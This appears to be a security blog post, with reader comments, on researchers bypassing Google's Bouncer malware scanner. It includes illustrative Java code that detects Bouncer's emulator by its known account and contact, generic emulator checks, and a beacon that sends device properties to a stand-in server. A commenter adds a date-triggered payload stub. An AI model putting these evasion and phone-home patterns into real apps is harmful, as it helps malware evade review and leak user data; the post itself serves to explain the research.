Two security researchers say that they have found multiple ways to bypass Bouncer, Google’s automated system for detecting malicious Android apps before they are made available in the Google Play store.
Google automatically runs newly uploaded apps through Bouncer before making them available to the general public. Bouncer runs each submitted app on an emulated Android smartphone, inside a virtual environment, and attempts to tell whether the app is capable of stealing data, sending expensive SMS messages, and so forth.
The challenge for malware authors, therefore, is to see if they can bypass Bouncer’s checks and sneak their malicious Android apps into the Google Play store.
Security researchers Charlie Miller and Jon Oberheide claim to have found multiple ways for Android apps to realise they are being tested by Bouncer and behave differently during the examination. If an app can tell the difference between running on a real Android phone and running in Bouncer's virtual environment, it can hide its malicious intentions while being tested and so avoid detection.
With Bouncer subverted, malicious apps could make their way onto Android smartphones belonging to the general public.
Miller and Oberheide discovered a number of tell-tale signs that their app was running on Google Bouncer rather than a real smartphone. For instance, they found that Google's simulations were all registered to the same account (Miles.Karlson@gmail.com), had only one contact in the address book (Michelle.k.levin@gmail.com) and contained a photo of Lady Gaga and an image of a cat.
If, without permission, an app tried to access the address book contact, or steal the Lady Gaga image, Bouncer would know the app being analysed was suspicious.
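To illustrate the idea (this is a sketch of my own, not the researchers' actual code), here is roughly what such a fingerprint check might look like using standard Android APIs; the BouncerFingerprint class name and the check logic are purely illustrative:

```java
import android.accounts.Account;
import android.accounts.AccountManager;
import android.content.Context;
import android.database.Cursor;
import android.provider.ContactsContract;

public class BouncerFingerprint {
    // Tell-tale values reported by Miller and Oberheide.
    private static final String BOUNCER_ACCOUNT = "Miles.Karlson@gmail.com";
    private static final String BOUNCER_CONTACT = "Michelle.k.levin@gmail.com";

    /** Returns true if the device looks like Bouncer's emulated environment. */
    public static boolean isLikelyBouncer(Context ctx) {
        // 1. Is the device registered to the known Bouncer Google account?
        //    (Requires the GET_ACCOUNTS permission.)
        for (Account account : AccountManager.get(ctx).getAccountsByType("com.google")) {
            if (BOUNCER_ACCOUNT.equalsIgnoreCase(account.name)) {
                return true;
            }
        }

        // 2. Is the address book a single entry, the known test contact?
        //    (Requires the READ_CONTACTS permission.)
        Cursor c = ctx.getContentResolver().query(
                ContactsContract.CommonDataKinds.Email.CONTENT_URI,
                new String[]{ContactsContract.CommonDataKinds.Email.ADDRESS},
                null, null, null);
        if (c != null) {
            try {
                if (c.getCount() == 1 && c.moveToFirst()
                        && BOUNCER_CONTACT.equalsIgnoreCase(c.getString(0))) {
                    return true;
                }
            } finally {
                c.close();
            }
        }
        return false;
    }
}
```

Note the irony: both checks need permissions (GET_ACCOUNTS, READ_CONTACTS) that the app must request up front, so a careful malware author would only bundle them into an app that plausibly needed them anyway.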
In a YouTube video published before their talk, Jon Oberheide demonstrates one of the ways in which Bouncer can be bypassed.
In the particular example shown, an app uploaded to the Google Play Android market detects that it is running on Bouncer's emulated Android device and opens a remote connection back to the researchers, allowing them to probe and fingerprint the environment.
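The exact payload and endpoint used in the demonstration haven't been published, so the hypothetical sketch below is an assumption about how the phone-home step could work: it simply ships a few android.os.Build properties to a collection server (example.com stands in for the real address):

```java
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.net.URLEncoder;

import android.os.Build;

public class Beacon {
    // example.com stands in for the collection server; the real endpoint and
    // payload format from the demo are not public, so this is an assumption.
    private static final String COLLECTOR = "http://example.com/fingerprint";

    /** Ships basic device properties home so the environment can be fingerprinted. */
    public static void reportEnvironment() throws Exception {
        String payload = "fingerprint=" + URLEncoder.encode(Build.FINGERPRINT, "UTF-8")
                + "&model=" + URLEncoder.encode(Build.MODEL, "UTF-8")
                + "&product=" + URLEncoder.encode(Build.PRODUCT, "UTF-8");

        // Needs the INTERNET permission, and must run off the main thread.
        HttpURLConnection conn = (HttpURLConnection) new URL(COLLECTOR).openConnection();
        conn.setDoOutput(true); // makes this a POST request
        OutputStream out = conn.getOutputStream();
        out.write(payload.getBytes("UTF-8"));
        out.close();
        conn.getInputStream().close(); // forces the request to be sent
        conn.disconnect();
    }
}
```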
The concept of malware using smart tricks to determine if it is being analysed or examined in a virtual environment – rather than a potential victim’s real device – is not a new one. For instance, there has been much Windows malware over the years which has incorporated anti-sandboxing, virtual machine detection and anti-debugging tricks to make analysis more difficult.
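On Android, the generic equivalent of those anti-VM tricks is to inspect build properties: the stock Android emulator ships with recognisable values such as "generic" and "goldfish". A minimal sketch of that sort of check (which values count as suspicious is a judgment call, and a hardened analysis environment could spoof all of them):

```java
import android.os.Build;

public class EmulatorChecks {
    /**
     * Classic build-property checks, in the spirit of the virtual machine
     * detection long seen in Windows malware, adapted to Android. The stock
     * emulator really does report values like these by default.
     */
    public static boolean looksEmulated() {
        return Build.FINGERPRINT.startsWith("generic")
                || Build.MODEL.contains("sdk")
                || Build.PRODUCT.contains("sdk")
                || "goldfish".equals(Build.HARDWARE); // QEMU's emulated board name
    }
}
```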
Miller and Oberheide, who are due to demonstrate their findings at a security conference in New York City today, shared their research in advance with Google, who presumably have taken steps to improve their systems.
There seems little doubt that we will see criminals using similar tricks when attempting to get their malware into the Google Play marketplace in the future. As ever, the battle continues with one side trying to get an advantage over the other.
By the way, if you’re worried about protecting your Android smartphone or tablet against the rising tide of Android malware be sure to check out the free beta of Sophos Mobile Security.
While I love Android, this is downright pathetic. Google is one of the biggest companies out there, and they don't even bother pushing updates, and now 5.0 is around the corner.
So if the app is date-activated, it won't be detected!! Millions could be installed and then activated after a particular date? Or is that too easy?
Not really. The app must acquire the permissions it needs at installation time and that's what would give it away.
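To spell that out: the time-bomb itself is trivial to write, but any dangerous permission still has to be declared in AndroidManifest.xml, visible at install time regardless of the date. A rough sketch (the trigger date and the sendExpensiveSms payload are made up for illustration):

```java
import java.util.Calendar;

public class TimeBomb {
    public static void maybeActivate() {
        // Stay dormant until an arbitrary future date (illustrative value).
        Calendar trigger = Calendar.getInstance();
        trigger.set(2013, Calendar.JANUARY, 1);

        if (Calendar.getInstance().after(trigger)) {
            // Even a dormant payload betrays itself: sending SMS requires
            // <uses-permission android:name="android.permission.SEND_SMS"/>
            // in the manifest, visible at install time regardless of the date.
            sendExpensiveSms(); // hypothetical payload
        }
    }

    private static void sendExpensiveSms() {
        // e.g. SmsManager.getDefault().sendTextMessage(...) to a premium-rate number
    }
}
```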
Umm, it's a fundamental principle of computer science that you cannot tell by examination whether a program will "finish" or will run forever. By extension, you also cannot tell whether it will behave maliciously. No matter how long you run it in the simulated environment, there's always the chance that it would act badly if you just ran it a little longer.
Such attempts at programmatically checking an app are doomed.
"Had we but world enough, and time,"…
That "fundamental principle of computer science" is a theoretical result for an abstract computer with infinite time and memory. A smartphone, however, is a finite state machine. Therefore it *could* actually be possible for a supercomputer to evaluate every possible state reachable from the program in question. However, this is again a theoretical rather than practical assertion. The sun would explode long before any of todays supercomputers could finish the computation.
Thus Turing's halting problem is actually irrelevant here (and in most other places where it is quoted to make similar assertions). Let's instead stick with pragmatic facts: it is true that no program can, in reasonable time and with available memory, 100% evaluate all possible behaviours of another application. However, that does not mean that "attempts at programmatically checking an app are doomed". There are techniques that can be used to predict and investigate the most likely or suspicious behaviour. In the end it comes down to a war of minds and technology between malware authors and security researchers. Yes, people will exploit the now-exposed weaknesses in Bouncer, but hopefully Google will respond by making a few changes and improvements.
…er, this is a minor point and not relevant to your otherwise worthy response, but for the record, the sun will NEVER explode. It doesn't have enough mass to create a supernova. Rather, it will expand into a red giant whose radius will most likely exceed the average radius of the Earth's orbit, long before which the human species will have become toast if it hasn't moved elsewhere by then…which will be roughly 5 billion years from now. Eventually, that expansion will cool the sun to the point wherein it can no longer generate enough radiation pressure to maintain such a large volume, and it will collapse to a white dwarf and eventually burn itself out.
Your point that Turing's halting problem is an irrelevant constraint for the PRACTICAL purposes of checking apps for malware is well taken, though.